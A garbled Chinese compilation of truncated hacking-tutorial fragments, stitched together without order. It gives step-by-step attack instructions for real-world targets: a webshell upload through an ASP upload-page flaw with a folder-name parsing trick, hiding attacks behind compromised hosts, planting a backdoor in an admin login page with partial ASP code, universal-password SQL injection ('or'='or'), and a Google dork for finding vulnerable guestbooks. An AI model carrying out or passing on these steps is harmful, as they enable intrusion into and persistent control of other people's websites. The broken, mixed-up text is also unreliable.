1.破下载：

a.将一些下载工具如：迅雷、flashget放到QQ网络硬盘上去，这当中有一个问题就是有可能网吧里打不开QQ硬盘（没下硬盘插件），这时我们可以切换到TM（一般这样就可以了）再打开QQ硬盘，如果还不行就事先把它们放到QQ邮箱的附件上去这样就可以了,到时再利用这些下载工具来下载。 www.Syue.com

b.就是破了它的限禁，网吧一般都是改注册表来限制我们下载，那么我们以其人之道还治其人之身，写一个.reg文件（注册表文件）来解了它,用记事本写下以下:

作者：龍影(kik)
程序不错 但是出现的漏洞也很不错 可能是程序开发者照顾广大大黑友吧~~ 如果真是这样 那就谢谢开发者了~~~(中国这样的程序开发者越多越好--哎呀！谁拿香蕉皮砸我了~~5555我不废话了还不行吗~!)

漏洞出现在 Utility/UploadFile/FileList.asp

这个页面可以 直接上传 下边是拿shell步骤：

在网站后便直接加上 Utility/UploadFile/FileList.asp 跳转到上传页面 然后新建文件夹 比如：123.asp

然后在我们刚才所建立的文件夹里上传格式为jpg的asp木马 比如xx.jpg （这里利用的是asp解

　　第一步：隐藏自已的位置

　　为了不在目的主机上留下自己的IP地址，防止被目的主机发现，老练的攻击者都会尽 量通过“跳板”或“肉鸡”展开攻击。所谓“肉鸡”通常是指，HACK实现通过后门程序控制 的傀儡主机，通过“肉鸡”开展的扫描及攻击，即便被发现也由于现场遗留环境的IP地址是 “肉鸡”的地址而很难追查。

　　第二步：寻找目标主机并分析目标主机

　　攻击者首先要寻找目标主机并分析目标主机。在Internet上能

第一种：

是在管理员的后台登陆界面隐藏我们的后门，这是相对比较安全的
因为管理员的入口不是经常换的，只要他的登陆界面在，我们的后门就在！
当然，你也可以灵活的插入其他文件中，只要这个文件不是经常换的

1.从我们的SHELL上找到管理员的入口页面
2.编辑它   在最后面写上一段代码复制内容到剪贴板代码:
<%if request.QueryString("action")="comeon" then
a=Request.TotalBytes:if a Then b="adodb.stream":Set c=Createobject(b):c

说实话如果一个网站的前台都是注入漏洞，那么凭经验，万能密码进后台的几率基本上是

百分之百。

可是有的人说对PHP的站如果是GPC魔术转换开启，就会对特殊符号转义，就彻底杜绝了

PHP注入。

其实说这话的人没有好好想过，更没有尝试过用万能密码进PHP的后台。

其实GPC魔术转换是否开启对用万能密码进后台一点影响也没有。

如果你用这样的万能密码'or'='or'，当然进不去，理由是GPC开启的时候单引号会被转换。

PHP注入时我

本文章无技术含量，只是提供一个思路，思路来源于前不久暴出的那个ewebeditor2.16版本的上传漏洞。对于过滤了单引号或者做了post防注入的 站点，此方法也无能为力了；但对于很多对登陆端没做处理的网站，此方法值得一试，尤其是你已经知道源码了却不能执行命令(ACCESS数据库)或者对方能报错( MYSQL数据库)。

首先我们回顾下老的万能密码or漏洞的实现机制，先帖一段asp源码：

---------------------------老的存在or漏洞的asp代码----------------------------------------

在检测某个动易网站时，无意中看了下留言板，打开一条留言，顺手加了个’，

出错了。一个留言板注射漏洞就这样诞生了，罪过。。。。。。

漏洞文件disp.asp，代码过滤不严，导致注射漏洞产生。

利用方法：GG100项，关键字：inurl:board/disp.asp?id=

很多的，大家试试看。。

搜索 inurl:board/disp.asp?id= 获得大约 50,700 条查询结果，以下是第 1-100 条。

由于各自的表段名不同，试着用啊D去跑就行了